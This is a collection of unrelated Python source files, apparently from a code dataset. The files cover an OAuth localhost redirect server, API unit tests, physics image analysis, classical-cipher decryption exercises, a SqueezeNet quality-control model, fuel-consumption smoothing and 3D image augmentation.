self, original_node: libcst.SimpleString, updated_node: libcst.SimpleString
) -> Union[libcst.SimpleString, libcst.BaseExpression]:
AddImportsVisitor.add_needed_import(self.context, "__future__", "annotations")
# Just use LibCST to evaluate the expression itself, and insert that as the
# annotation.
return parse_expression(
updated_node.evaluated_value, config=self.module.config_for_parsing
)
|
StarcoderdataPython
|
1679565
|
from onshape_client.compatible_imports import HTTPServer, HTTPHandler, sendable
def start_server(authorization_callback, open_grant_authorization_page_callback):
"""
:param authorization_callback: The function to call once with the authorization URL response
:param open_grant_authorization_page_callback: The function to call when the server starts - for example opening a webpage
:return:
"""
ServerClass = MakeServerClass(open_grant_authorization_page_callback)
server = ServerClass(
("localhost", 9000), MakeHandlerWithCallbacks(authorization_callback)
)
server.serve_forever()
def MakeServerClass(open_grant_authorization_page_callback):
class OAuth2RedirectServer(HTTPServer, object):
def server_activate(self):
super(OAuth2RedirectServer, self).server_activate()
open_grant_authorization_page_callback()
return OAuth2RedirectServer
def MakeHandlerWithCallbacks(authorization_callback):
class OAuth2RedirectHandler(HTTPHandler):
def do_GET(self):
try:
# Say we are at an https port so that OAuth package doesn't complain. This isn't a security concern because
# it is just so that the authorization code is correctly parsed.
print("path:"+str(self.path))
authorization_callback(authorization_response="https://localhost" + self.path)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
content = """
<html><head><title>Success!</title></head>
<body><p>You successfully authorized the application, and your authorization url is: {}</p>
<p>You may close this tab.</p>
</body></html>
""".format(
self.path
)
self.wfile.write(sendable(content))
except BaseException as e:
self.send_response(500)
self.send_header("Content-type", "text/html")
self.end_headers()
content = """
<html><head><title>Error!</title></head>
<body><p>Something happened and here is what we know: {}</p>
<p>You may close this tab.</p>
</body></html>
""".format(
e
)
self.wfile.write(sendable(content))
import threading
assassin = threading.Thread(target=self.server.shutdown)
assassin.daemon = True
assassin.start()
return OAuth2RedirectHandler
|
StarcoderdataPython
|
4808450
|
# Copyright The Linux Foundation and each contributor to CommunityBridge.
# SPDX-License-Identifier: MIT
import json
import os
from http import HTTPStatus
from unittest.mock import Mock, patch, MagicMock
import pytest
import cla
from cla.models.dynamo_models import UserPermissions
from cla.salesforce import get_projects, get_project
@pytest.fixture()
def user():
""" Patch authenticated user """
with patch("cla.auth.authenticate_user") as mock_user:
mock_user.username.return_value = "test_user"
yield mock_user
@pytest.fixture()
def user_permissions():
""" Patch permissions """
with patch("cla.salesforce.UserPermissions") as mock_permissions:
yield mock_permissions
@patch.dict(cla.salesforce.os.environ,{'CLA_BUCKET_LOGO_URL':'https://s3.amazonaws.com/cla-project-logo-dev'})
@patch("cla.salesforce.requests.get")
def test_get_salesforce_projects(mock_get, user, user_permissions):
""" Test getting salesforce projects via project service """
#breakpoint()
cla.salesforce.get_access_token = Mock(return_value=("token", HTTPStatus.OK))
sf_projects = [
{
"Description": "Test Project 1",
"ID": "foo_id_1",
"ProjectLogo": "https://s3/logo_1",
"Name": "project_1",
},
{
"Description": "Test Project 2",
"ID": "foo_id_2",
"ProjectLogo": "https://s3/logo_2",
"Name": "project_2",
},
]
user_permissions.projects.return_value = set({"foo_id_1", "foo_id_2"})
# Fake event
event = {"httpMethod": "GET", "path": "/v1/salesforce/projects"}
# Mock project service response
response = json.dumps({"Data": sf_projects})
mock_get.return_value.text = response
mock_get.return_value.status_code = HTTPStatus.OK
expected_response = [
{
"name": "project_1",
"id": "foo_id_1",
"description": "Test Project 1",
"logoUrl": "https://s3.amazonaws.com/cla-project-logo-dev/foo_id_1.png"
},
{
"name": "project_2",
"id": "foo_id_2",
"description": "Test Project 2",
"logoUrl": "https://s3.amazonaws.com/cla-project-logo-dev/foo_id_2.png"
},
]
assert get_projects(event, None)["body"] == json.dumps(expected_response)
@patch.dict(cla.salesforce.os.environ,{'CLA_BUCKET_LOGO_URL':'https://s3.amazonaws.com/cla-project-logo-dev'})
@patch("cla.salesforce.requests.get")
def test_get_salesforce_project_by_id(mock_get, user, user_permissions):
""" Test getting salesforce project given id """
# Fake event
event = {
"httpMethod": "GET",
"path": "/v1/salesforce/project/",
"queryStringParameters": {"id": "foo_id"},
}
sf_projects = [
{
"Description": "Test Project",
"ID": "foo_id",
"ProjectLogo": "https://s3/logo_1",
"Name": "project_1",
},
]
user_permissions.return_value.to_dict.return_value = {"projects": set(["foo_id"])}
mock_get.return_value.json.return_value = {"Data": sf_projects}
mock_get.return_value.status_code = HTTPStatus.OK
expected_response = {
"name": "project_1",
"id": "foo_id",
"description": "Test Project",
"logoUrl": "https://s3.amazonaws.com/cla-project-logo-dev/foo_id.png"
}
assert get_project(event, None)["body"] == json.dumps(expected_response)
|
StarcoderdataPython
|
1767200
|
from multiprocessing import Pool
import itertools
def chunks(l, n):
count = 0
for i in range(0, len(l), n):
yield l[i: i + n], count
count += 1
def multiprocessing(strings, function, cores=16):
df_split = chunks(strings, len(strings) // cores)
pool = Pool(cores)
pooled = pool.map(function, df_split)
pool.close()
pool.join()
|
StarcoderdataPython
|
1759439
|
<reponame>adswa/PyNIDM
from .Core import Core
from .Project import Project
from .Session import Session
from .Acquisition import Acquisition
from .AssessmentAcquisition import AssessmentAcquisition
from .MRAcquisition import MRAcquisition
from .AcquisitionObject import AcquisitionObject
from .MRObject import MRObject
from .DemographicsObject import DemographicsObject
from .AssessmentObject import AssessmentObject
|
StarcoderdataPython
|
185311
|
<gh_stars>0
# coding: utf-8
import os
from lib import *
from tqdm import tqdm
# Vigenere complexity : O(n^4 + n^3 + n^2 + n)
# Cesar complexity : O(n^2(n+1)/2 + n)
def auto_decipher(code, n):
if max(freq(code).items(), key=operator.itemgetter(1))[0] == ' ':
method = scytale
else:
method = vigenere
print(method)
for i in tqdm(range(1, n)):
dc = method(code, i)
if "Joël" in dc : # Choose a word wich could the most probably appear in the message
f = open("D:/code/UE_Crypto_Charpak/message_decrypted.txt", "a", encoding='UTF-8')
f.write(dc)
f.close()
print(dc)
break
def decipher(code,method, n):
for i in tqdm(range(1, n)):
dc = method(code, i)
if "Joël" in dc : # Choose a word wich could the most probably appear in the message
f = open("D:/code/UE_Crypto_Charpak/message_decrypted.txt", "a")
f.close()
print(dc)
break
#decipher(read("D:/code/UE_Crypto_Charpak/Codes/message1.txt"),scytale ,len(read("D:/code/UE_Crypto_Charpak/Codes/message1.txt")))
#decipher(read("D:/code/UE_Crypto_Charpak/Codes/message7.txt"),vigenere, 100)
#auto_decipher(read("D:/code/UE_Crypto_Charpak/Codes/message1.txt") ,len(read("D:/code/UE_Crypto_Charpak/Codes/message1.txt")))
#auto_decipher(read("D:/code/UE_Crypto_Charpak/Codes/message7.txt"), 100)
|
StarcoderdataPython
|
169572
|
# Takes RAW arrays and returns calculated OD for given shot
# along with the best fit (between gaussian and TF) for ROI.
from __future__ import division
from lyse import *
from pylab import *
from common.fit_gaussian_2d import fit_2d
from common.traces import *
from spinor.aliases import *
from time import time
from scipy.ndimage import *
from mpl_toolkits.axes_grid1 import make_axes_locatable
from common.OD_handler import ODShot
import os
import pandas as pd
import numpy as np
import numexpr as ne
import matplotlib.gridspec as gridspec
import fit_table
from analysislib.common.get_raw_images import get_raw_images
# Parameters
pixel_size = 5.6e-6/5.33# Divided by Magnification Factor
# 5.6e-6/5.33 for z in situ # Yuchen and Paco: 08/19/2016
#5.6e-6/3.44 for z TOF # Yuchen and Paco: 08/19/2016
#5.6e-6/2.72 for x-in situ # Paco: 05/06/2016
sigma0 = 3*(780e-9)**2/(2*3.14)
# Time stamp
print '\nRunning %s' % os.path.basename(__file__)
t = time()
# Load dataframe
run = Run(path)
# Methods
def print_time(text):
print 't = %6.3f : %s' % ((time()-t), text)
def raw_to_OD(fpath):
reconstruction_group = 'reconstruct_images'
atoms, probe, bckg = get_raw_images(fpath)
rchi2_item = (reconstruction_group, 'reconstructed_probe_rchi2')
df = data(fpath)
if rchi2_item in df and not np.isnan(df[rchi2_item]):
with h5py.File(fpath) as f:
if reconstruction_group in f['results']:
probe = run.get_result_array('reconstruct_images', 'reconstructed_probe')
bckg = run.get_result_array('reconstruct_images', 'reconstructed_background')
div = np.ma.masked_invalid((atoms - bckg)/(probe - bckg))
div = np.ma.masked_less_equal(div, 0.)
another_term = 0 # (probe-atoms)/(Isat)
alpha = 1.0
calculated_OD = np.array(-alpha*np.log(div) + another_term)
return np.matrix(calculated_OD)
# Main
try:
#plt.xkcd()
with h5py.File(path) as h5_file:
if '/data' in h5_file:
print_time('Calculating OD...')
# Get OD
_OD_ = raw_to_OD(path)
print_time('Get OD...')
OD = ODShot(_OD_)
F, mF, _ROI_, BCK_a = OD.get_ROI(sniff=False, get_background=False)
_, _, ROIcoords, _ = np.load(r'C:\labscript_suite\userlib\analysislib\paco_analysis\ROI_temp.npy')
point1, point2 = ROIcoords
x1, y1 = point1
x2, y2 = point2
ROI = ODShot(_ROI_)
BCK = np.mean(BCK_a)*np.ones(_ROI_.shape)
run.save_result( 'pkOD', (np.amax(_ROI_.astype(float16))))
# Compute number
if True: #stored == "z-TOF":
N = (np.sum((_ROI_-BCK)/sigma0)*pixel_size**2)
print 0.2*pixel_size**2/sigma0
run.save_result(('N_(' + str(F) +',' +str(mF)+')'), N)
else:
N = 0
# Display figure with shot, slices and fits and N
fig = figure(figsize=(8, 5), frameon=False)
gs = gridspec.GridSpec(2, 2, width_ratios=[1,2], height_ratios=[4,1])
subplot(gs[2])
str = r'N = %.0f' % N
text(0.4, 0.6, str, ha='center', va='top',fontsize=18)
gca().axison = False
tight_layout()
# OD and ROI display
subplot(gs[1])
im0= imshow(_OD_, vmin= -0.0, vmax = 0.4, cmap='viridis', aspect='equal', interpolation='none')
#axvline(x1, color='r')
#axvline(x2, color='r')
#axhline(y1, color='r')
#axhline(y2, color='r')
divider = make_axes_locatable(gca())
cax = divider.append_axes("right", "5%", pad="3%")
colorbar(im0, cax=cax)
title('OD')
tight_layout()
# Raw data is displayed and if fits are unsuccesful only show raws.
# Slice
print_time('Slice and fit...')
xcolOD, x_ax = OD.slice_by_segment_OD(coord_a=np.array([170, 100]), coord_b=np.array([170, 600]))
ycolOD, y_ax = OD.slice_by_segment_OD(coord_a=np.array([50, 322]), coord_b=np.array([300, 322]))
y_ax=y_ax[::-1]
# Raw data is displayed and if fits are unsuccesful only show raws.
# Gaussian 1D
x_gaussian_par, dx_gaussian_par = fit_gaussian(x_ax, xcolOD)
y_gaussian_par, dy_gaussian_par = fit_gaussian(y_ax, ycolOD)
run.save_result('x_gauss_width', np.abs(x_gaussian_par[2]*pixel_size/(1e-6*4*np.log(2))))
run.save_result('y_gauss_width', np.abs(y_gaussian_par[2]*pixel_size/(1e-6*4*np.log(2))))
run.save_result('2dwidth', np.sqrt(x_gaussian_par[2]**2+y_gaussian_par[2]**2))
run.save_result('gauss_amp', np.abs(x_gaussian_par[0]-x_gaussian_par[3]))
run.save_result('x_gauss_center', np.where(xcolOD == np.amax(xcolOD))[0][0])
run.save_result('y_gauss_center', (480-y_gaussian_par[1])*5.6e-6)
run.save_result('integrated_linOD', np.sum(xcolOD))
print 'x Gaussian fit'
#fit_table.get_params(dx_gaussian_par)
print 'y Gaussian fit'
#fit_table.get_params(dy_gaussian_par)
x_gaussian_fit = gaussian(x_ax, x_gaussian_par[0], x_gaussian_par[1], x_gaussian_par[2], x_gaussian_par[3])
y_gaussian_fit = gaussian(y_ax, y_gaussian_par[0], y_gaussian_par[1], y_gaussian_par[2], y_gaussian_par[3])
if (x_gaussian_fit is not None or y_gaussian_fit is not None):
# <NAME> 1D
print_time('Gauss fit successful for x and y')
x_tf_par, dx_tf_par = fit_thomas_fermi(x_ax, xcolOD)
y_tf_par, dy_tf_par = fit_thomas_fermi(y_ax, ycolOD)
print 'x Thomas Fermi fit'
fit_table.get_params(dx_tf_par)
print 'y <NAME> fit'
fit_table.get_params(dy_tf_par)
x_tf_fit = thomas_fermi(x_ax, x_tf_par[0], x_tf_par[1], x_tf_par[2], x_tf_par[3])
y_tf_fit = thomas_fermi(y_ax, y_tf_par[0], y_tf_par[1], y_tf_par[2], y_tf_par[3])
run.save_result('ATF', (x_tf_par[2]**2+y_tf_par[2]**2))
if(x_tf_fit is not None or y_tf_fit is not None):
print_time('TF fit successful for x and y')
subplot(gs[3])
plot(x_ax, xcolOD, 'b', x_ax, x_gaussian_fit, 'r', x_ax, (x_tf_fit), 'g')
xlabel('xpos (um)')
ylabel('OD')
title('x_slice')
#axis([0, 600, -0.4, 2.0])
tight_layout()
subplot(gs[0])
plot(ycolOD, y_ax, y_gaussian_fit, y_ax, 'r', y_tf_fit, y_ax, 'g')
xlabel('OD')
ylabel('ypos (um)')
title('y_slice')
#axis([-0.4, 2.0, 600, 0])
tight_layout()
show()
run.save_result('TF_width', np.abs(2*y_tf_par[2]*pixel_size/(1e-6)))
#omega_par = np.sqrt(3*N*1.05e-34*2*pi*30e3*5.3e-9/(1.44e-25*(x_tf_par[2]*1.7/(2*1e6))**3))/(2*pi)
#run.save_result('freq_long', omega_par)
else:
raise Exception ('Can only do Gaussian fit')
subplot(gs[3])
plot(x_ax, xcolOD, 'b', x_ax, x_gaussian_fit, 'r')
xlabel('xpos (um)')
ylabel('OD')
title('x_slice')
#axis([0, 600, -0.4, 2.0])
tight_layout()
subplot(gs[0])
plot(ycolOD, y_ax, y_gaussian_fit, y_ax, 'r')
xlabel('OD')
ylabel('ypos (um)')
title('y_slice')
#axis([-0.4, 2.0, 600, 0])
tight_layout()
show()
run.save_result('gauss_amp', np.abs(y_gaussian_par[0]))
else:
raise Exception ('Can\'t fit')
print_time('Gauss fit unsuccessful for x or y')
subplot(gs[3])
plot(x_ax, xcolOD)
xlabel('xpos (um)')
ylabel('OD')
title('x_slice')
#axis([0, 600, -0.4, 2.0])
tight_layout()
subplot(gs[0])
plot(ycolOD, y_ax)
xlabel('OD')
ylabel('ypos (um)')
title('y_slice')
#axis([-0.4, 2.0, 600, 0])
tight_layout()
show()
else:
print_time('Unsuccessful...')
raise Exception( 'No image found in file...' )
print '\n ********** Successful **********\n\n'
except Exception as e:
print '%s' %e + os.path.basename(path)
print '\n ********** Not Successful **********\n\n'
|
StarcoderdataPython
|
1665805
|
<reponame>felliott/modular-odm
import os
from modularodm import fields, StoredObject
from modularodm.query.query import RawQuery as Q
from tests.base import ModularOdmTestCase
# TODO: The following are defined in MongoStorage, but not PickleStorage:
# 'istartswith'
# 'iendswith',
# 'exact',
# 'iexact'
class StringComparisonTestCase(ModularOdmTestCase):
def define_objects(self):
class Foo(StoredObject):
_id = fields.IntegerField(primary=True)
string_field = fields.StringField()
return Foo,
def set_up_objects(self):
self.foos = []
field_values = (
'first value',
'second value',
'third value',
)
for idx in range(len(field_values)):
foo = self.Foo(
_id=idx,
string_field=field_values[idx],
)
foo.save()
self.foos.append(foo)
def tear_down_objects(self):
try:
os.remove('db_Test.pkl')
except OSError:
pass
def test_contains(self):
""" Finds objects with the attribute containing the substring."""
result = self.Foo.find(
Q('string_field', 'contains', 'second')
)
self.assertEqual(len(result), 1)
def test_icontains(self):
""" Operates as ``contains``, but ignores case."""
result = self.Foo.find(
Q('string_field', 'icontains', 'SeCoNd')
)
self.assertEqual(len(result), 1)
def test_startwith(self):
""" Finds objects where the attribute begins with the substring """
result = self.Foo.find(
Q('string_field', 'startswith', 'second')
)
self.assertEqual(len(result), 1)
def test_endswith(self):
""" Finds objects where the attribute ends with the substring """
result = self.Foo.find(
Q('string_field', 'endswith', 'value')
)
self.assertEqual(len(result), 3)
|
StarcoderdataPython
|
3338574
|
<filename>hat/audit/admin.py
from django.contrib import admin
from .models import Modification
class ModificationAdmin(admin.ModelAdmin):
date_hierarchy = "created_at"
list_filter = ("content_type", "source")
search_fields = ("user",)
admin.site.register(Modification, ModificationAdmin)
|
StarcoderdataPython
|
3215762
|
<reponame>glomerulus-lab/nonnegative_connectome
import scipy.io
experiments = ["../data/nonnegative_top_view_top_view_100_tol_e-4_e-5", "../data/nonnegative_flatmap_flatmap_100_tol_e-4_e-5", "data/nonnegative_top_view_top_view_100_tol_e-5", "data/nonnegative_flatmap_flatmap_100_tol_e-5"]
for experiment in experiments:
data = scipy.io.loadmat(experiment)
print(data["time_refining"], data["time_final_solution"], data["cost_final"])
|
StarcoderdataPython
|
171617
|
<filename>clinicadl/clinicadl/preprocessing/model/squezenet_qc.py
import torch
import torch.nn as nn
import math
import torch.utils.model_zoo as model_zoo
import torch.nn.init as init
from torchvision import models
from torch.nn.parameter import Parameter
# based on https://github.com/pytorch/vision/blob/master/torchvision/models/squeezenet.py
class Fire(nn.Module):
def __init__(self, inplanes, squeeze_planes,
expand1x1_planes, expand3x3_planes):
super(Fire, self).__init__()
self.inplanes = inplanes
self.squeeze = nn.Conv2d(inplanes, squeeze_planes, kernel_size=1)
self.squeeze_activation = nn.ReLU(inplace=True)
self.expand1x1 = nn.Conv2d(squeeze_planes, expand1x1_planes,
kernel_size=1)
self.expand1x1_activation = nn.ReLU(inplace=True)
self.expand3x3 = nn.Conv2d(squeeze_planes, expand3x3_planes,
kernel_size=3, padding=1)
self.expand3x3_activation = nn.ReLU(inplace=True)
def forward(self, x):
x = self.squeeze_activation(self.squeeze(x))
return torch.cat([
self.expand1x1_activation(self.expand1x1(x)),
self.expand3x3_activation(self.expand3x3(x))
], 1)
class SqueezeNetQC(nn.Module):
def __init__(self, version=1.0, num_classes=2, use_ref=False):
super(SqueezeNetQC, self).__init__()
self.use_ref = use_ref
self.feat = 3
if version not in [1.0, 1.1]:
raise ValueError("Unsupported SqueezeNet version {version}:"
"1.0 or 1.1 expected".format(version=version))
self.num_classes = num_classes
if version == 1.0:
self.features = nn.Sequential(
nn.Conv2d(2 if use_ref else 1, 96, kernel_size=7, stride=2),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=True),
Fire(96, 16, 64, 64),
Fire(128, 16, 64, 64),
Fire(128, 32, 128, 128),
nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=True),
Fire(256, 32, 128, 128),
Fire(256, 48, 192, 192),
Fire(384, 48, 192, 192),
Fire(384, 64, 256, 256),
nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=True),
Fire(512, 64, 256, 256),
)
else:
self.features = nn.Sequential(
nn.Conv2d(2 if use_ref else 1, 64, kernel_size=3, stride=2),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=True),
Fire(64, 16, 64, 64),
Fire(128, 16, 64, 64),
nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=True),
Fire(128, 32, 128, 128),
Fire(256, 32, 128, 128),
nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=True),
Fire(256, 48, 192, 192),
Fire(384, 48, 192, 192),
Fire(384, 64, 256, 256),
Fire(512, 64, 256, 256),
)
# Final convolution is initialized differently form the rest
final_conv = nn.Conv2d(512*self.feat, self.num_classes, kernel_size=1)
self.classifier = nn.Sequential(
nn.Dropout(p=0.5),
final_conv,
nn.ReLU(inplace=True),
nn.AvgPool2d(13, stride=1)
)
for m in self.modules():
if isinstance(m, nn.Conv2d):
if m is final_conv:
init.normal(m.weight.data, mean=0.0, std=0.01)
else:
init.kaiming_uniform(m.weight.data)
if m.bias is not None:
m.bias.data.zero_()
def forward(self, x):
# split feats into batches, so each view is passed separately
x = x.view(-1, 2 if self.use_ref else 1 ,224,224)
x = self.features(x)
# reshape input to take into account 3 views
x = x.view(-1, 512*self.feat,13,13)
x = self.classifier(x)
return x.view(x.size(0), self.num_classes)
def load_from_std(self, std_model):
# import weights from the standard ResNet model
# TODO: finish
# first load all standard items
own_state = self.state_dict()
for name, param in std_model.state_dict().items():
if name == 'features.0.weight':
if isinstance(param, Parameter):
param = param.data
# convert to mono weight
# collaps parameters along second dimension, emulating grayscale feature
mono_param=param.sum( 1, keepdim=True )
if self.use_ref:
own_state[name].copy_( torch.cat((mono_param,mono_param),1) )
else:
own_state[name].copy_( mono_param )
pass
elif name == 'classifier.1.weight' or name == 'classifier.1.bias':
# don't use at all
pass
elif name in own_state:
if isinstance(param, Parameter):
param = param.data
try:
own_state[name].copy_(param)
except Exception:
raise RuntimeError('While copying the parameter named {}, '
'whose dimensions in the model are {} and '
'whose dimensions in the checkpoint are {}.'
.format(name, own_state[name].size(), param.size()))
def squeezenet_qc(pretrained=False, **kwargs):
"""Constructs a SqueezeNet 1.1 model
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = SqueezeNetQC(version=1.1, **kwargs)
if pretrained:
# load basic Resnet model
model_ft = models.squeezenet1_1(pretrained=True)
model.load_from_std(model_ft)
return model
|
StarcoderdataPython
|
1787417
|
import datetime
import fuel
def update_refueling_list():
r0 = fuel.Refueling.all().order('odo').get()
if r0.odo > 0:
new_r0 = fuel.Refueling(date=datetime.datetime.combine(r0.date.date(),datetime.time(0,0,0)), odo=0, liters=0.0)
new_r0.save()
rest_liters = list(fuel.Refueling.all().order('odo'))
run_restliter_algo(rest_liters)
for rl in rest_liters: rl.save()
def run_restliter_algo(refuelings):
def smooth_forward(refuelings,convergence_speed=0.8,tank_size = None):
if tank_size is None:
tank_size = max(x.liters for x in refuelings)
start_average = _get_average(refuelings,1)
update_low(refuelings,0,start_average,convergence_speed,tank_size)
for i in xrange(len(refuelings)-2):
update_high(refuelings,i,_get_average(refuelings,i+1),convergence_speed,tank_size)
def smooth_backward(refuelings,convergence_speed=0.5,tank_size = None):
if tank_size is None:
tank_size = max(x.liters for x in refuelings)
start_average = _get_average(refuelings,len(refuelings)-3)
update_high(refuelings,len(refuelings)-2,start_average,convergence_speed + (1-convergence_speed) * 0.5 ,tank_size)
for i in xrange(len(refuelings)-2,1,-1):
update_low(refuelings,i,_get_average(refuelings,i-1),convergence_speed + (1-convergence_speed) * 0.5,tank_size)
def update_high(refuelings,i,avg,convergence_speed,tank_size):
desired_rest = (-1.0 * avg * (refuelings[i+1].odo-refuelings[i].odo))+refuelings[i].liters+refuelings[i].rest_liters
desired_rest = refuelings[i+1].rest_liters + (convergence_speed * (desired_rest-refuelings[i+1].rest_liters))
refuelings[i+1].rest_liters = _get_within_bounds(0,tank_size-refuelings[i+1].liters,desired_rest)
def update_low(refuelings,i,avg,convergence_speed,tank_size):
desired_rest = (avg * (refuelings[i+1].odo-refuelings[i].odo))-refuelings[i].liters+refuelings[i+1].rest_liters
desired_rest = refuelings[i].rest_liters + (convergence_speed * (desired_rest-refuelings[i].rest_liters))
refuelings[i].rest_liters = _get_within_bounds(0,tank_size-refuelings[i].liters,desired_rest)
def _get_average(refuelings, i):
return (refuelings[i].liters + refuelings[i].rest_liters - refuelings[i+1].rest_liters) / (refuelings[i+1].odo - refuelings[i].odo)
def _get_within_bounds(min_val, max_val, val):
return float(min(max_val,max(min_val,val)))
for i in xrange(4):
smooth_forward(refuelings,1.0/(i+1.0))
smooth_backward(refuelings,1.0/(i+1.0))
|
StarcoderdataPython
|
1741940
|
<filename>src/augment.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Nov 21 15:30:54 2019
@author: paskali
"""
"""
Train images augmentation.
Load images and binary masks from train folder, and apply various methods
for transformation. Finally save them in the train folder.
"""
import random, time, csv, os
import numpy as np
import elasticdeform
from scipy import ndimage
import tensorflow as tf
def rotation(image, mask):
"""
Apply rotation to image and binary mask.
Parameters
----------
image : numpy array
3D numpy array of image.
mask : numpy array
3D numpy array of binary mask.
Returns
-------
numpy array, numpy array
rotated image and binary mask.
"""
angle = np.random.randint(-20,20)
return _fix_image_size(ndimage.rotate(image, angle, cval=image.min()), image.shape), _fix_image_size(ndimage.rotate(mask, angle), mask.shape)
def elastic_deform(image, mask, sigma=4):
"""
Apply transversal elastic deformation to each slide of image
and binary mask. Then save them to corresponding image_path and mask_path.
Parameters
----------
image : nparray
3D nparray of image.
mask : nparray
3D nparray of binary mask.
sigma : int
used for elastic deformation. The default is 4.
lower value for images with lower resolution, could be higher for images
with higher resolution.
E.g.:
3-4 sigma for resolution of 128 x 128
15-20 sigma for resolution of 512 x 512
Returns
-------
numpy array, numpy array
deformed image and binary mask.
"""
# Sigma 20 is okay for (512,512), but for lower resolution it should be lower.
# Use 3 for smoother deformation, and 5 for stronger.
image, mask = elasticdeform.deform_random_grid([image, mask], sigma=sigma, points=3, cval=image.min(), prefilter=False, axis=(0,1))
mask = np.where(mask != 1, 0, 1)
return image, mask
def random_zoom(image, mask):
"""
Randomly resize image and binary mask by zoom factor in range from 0.8 to 1.2
Parameters
----------
image : nparray
3D nparray of image.
mask : nparray
3D nparray of binary mask.
Returns
-------
numpy array, numpy array
resized image and binary mask.
"""
zoom = np.random.uniform(0.8, 1.2)
return _fix_image_size(ndimage.zoom(image, zoom), image.shape), _fix_image_size(ndimage.zoom(mask, zoom), mask.shape)
def random_shift(image, mask):
"""
Randomly shift image and binary mask in range X = [-10,10] and Y = [-10,10]
Parameters
----------
image : nparray
3D nparray of image.
mask : nparray
3D nparray of binary mask.
Returns
-------
numpy array, numpy array
shifted image and binary mask.
"""
x_shift, y_shift, z_shift = (np.random.randint(-10,10), np.random.randint(-10,10), 0)
return _fix_image_size(ndimage.shift(image, (x_shift, y_shift, z_shift))), _fix_image_size(ndimage.shift(mask, (x_shift, y_shift, z_shift)))
def mean_filter(image, mask):
'''
Apply mean filter.
Parameters
----------
image : nparray
3D nparray of image.
mask : nparray
3D nparray of binary mask.
Returns
-------
numpy array, numpy array
shifted image and binary mask.
'''
return ndimage.uniform_filter(image, size=(3,3,3)), mask
def median_filter(image, mask):
'''
Apply median filter.
Parameters
----------
image : nparray
3D nparray of image.
mask : nparray
3D nparray of binary mask.
Returns
-------
numpy array, numpy array
shifted image and binary mask.
'''
return ndimage.median_filter(image, size=(3,3,3)), mask
def gauss_filter(image, mask):
'''
Apply gaussian filter.
Parameters
----------
image : nparray
3D nparray of image.
mask : nparray
3D nparray of binary mask.
Returns
-------
numpy array, numpy array
shifted image and binary mask.
'''
return ndimage.gaussian_filter(image, sigma=1), mask
def _fix_image_size(image, target_size):
"""
Crop 3D image to target size. If any axis size is lower than
target size, add padding to reach target size.
Parameters
----------
image : nparray
3D nparray.
target_size : tuple
tuple with value for every axis.
Returns
-------
nparray
cropped image with target size.
"""
org_x, org_y, org_z = image.shape
target_x, target_y, target_z = target_size
if target_x > org_x:
modulo = (target_x - org_x) % 2
offset = (target_x - org_x) // 2
image = np.pad(image, ((offset, offset + modulo),(0,0),(0,0)), mode='constant')
if target_y > org_y:
modulo = (target_y - org_y) % 2
offset = (target_y - org_y) // 2
image = np.pad(image, ((0,0),(offset, offset + modulo),(0,0)), mode='constant')
if target_z > org_z:
modulo = (target_z - org_z) % 2
offset = (target_z - org_z) // 2
image = np.pad(image, ((0,0),(0,0),(offset, offset + modulo)), mode='constant')
org_x, org_y, org_z = image.shape
off_x, off_y, off_z = (org_x - target_x)//2, (org_y - target_y)//2, (org_z - target_z)//2
minx, maxx = off_x, target_x + off_x
miny, maxy = off_y, target_y + off_y
minz, maxz = off_z, target_z + off_z
return image[minx:maxx, miny:maxy, minz:maxz]
def augment_generator_probability(train_ds, factor, rotate_p, deform_p, filters_p, epochs,
mean_filter_p=0.33, median_filter_p=0.33, gauss_filter_p=0.33):
"""
Generator that yields augmented images. The augmentation is performed according to
probability values, increasing the dataset by defined factor.
Saves a report of augmentation in /logs directory.
Parameters
----------
train_ds : tuple
tuple containing image and binary mask.
factor : int
the factor by which the sample will be increased (E.g. final sample size = factor * train sample size).
rotate_p : float
the probability of rotation.
deform_p : float
the probability of deformation.
filters_p : float
the probability to apply filters.
epochs : int
the number of sets of images to be generated.
mean_filter_p : TYPE, optional
The probability to apply mean filter. The default is 0.33.
median_filter_p : TYPE, optional
The probability to apply median filter. The default is 0.33.
gauss_filter_p : TYPE, optional
The probability to apply gaussian filter. The default is 0.33.
Yields
------
image : tensor
tensor of the image.
mask : tensor
tensor of the mask.
"""
if not os.path.exists("./logs"):
os.mkdir("logs")
log_name = f'logs/aug_{time.strftime("%Y%m%d%H%M",time.localtime())}.log'
with open(log_name, 'w', newline='') as csvfile:
fieldnames = ['rotate', 'deform', 'filters', 'filter']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
for _ in range(epochs):
for x, y in train_ds:
for i in range(factor):
inst={'rotate':'off',
'deform':'off',
'filters':'off',
'filter':'no'}
image, mask = x, y
if random.random() < rotate_p:
image, mask = rotation(image, mask)
inst['rotate'] = 'on'
if random.random() < deform_p:
image, mask = elastic_deform(image, mask)
inst['deform'] = 'on'
if random.random() < filters_p:
inst['filters'] = 'on'
chance = random.random()
if chance < mean_filter_p:
image, mask = mean_filter(image, mask)
inst['filter'] = 'mean'
elif chance < mean_filter_p + median_filter_p:
inst['filter'] = 'median'
image, mask = median_filter(image, mask)
else:
inst['filter'] = 'gauss'
image, mask = gauss_filter(image, mask)
with open(log_name, 'a') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=list(inst.keys()))
writer.writerow(inst)
image = np.reshape(image, image.shape + (1,))
mask = np.reshape(mask, mask.shape + (1,))
image = np.reshape(image, (1,) + image.shape)
mask = np.reshape(mask, (1,) + mask.shape)
image = tf.convert_to_tensor(image)
mask = tf.convert_to_tensor(mask)
yield image, mask
|
StarcoderdataPython
|
55825
|
<reponame>mlyundin/Machine-Learning
import numpy as np
def load_data(file_name):
data = np.loadtxt(file_name, delimiter=',')
X = data[:, :-1]
y = data[:, -1:]
return X, y
def transform_arguments(tranformation):
def dec(f):
def wrapper(*args, **kwargs):
t_args = map(tranformation, args)
t_kwargs = {k: tranformation(v) for k, v in kwargs.iteritems()}
return f(*t_args, **t_kwargs)
return wrapper
return dec
matrix_args = transform_arguments(lambda arg: np.matrix(arg, copy=False))
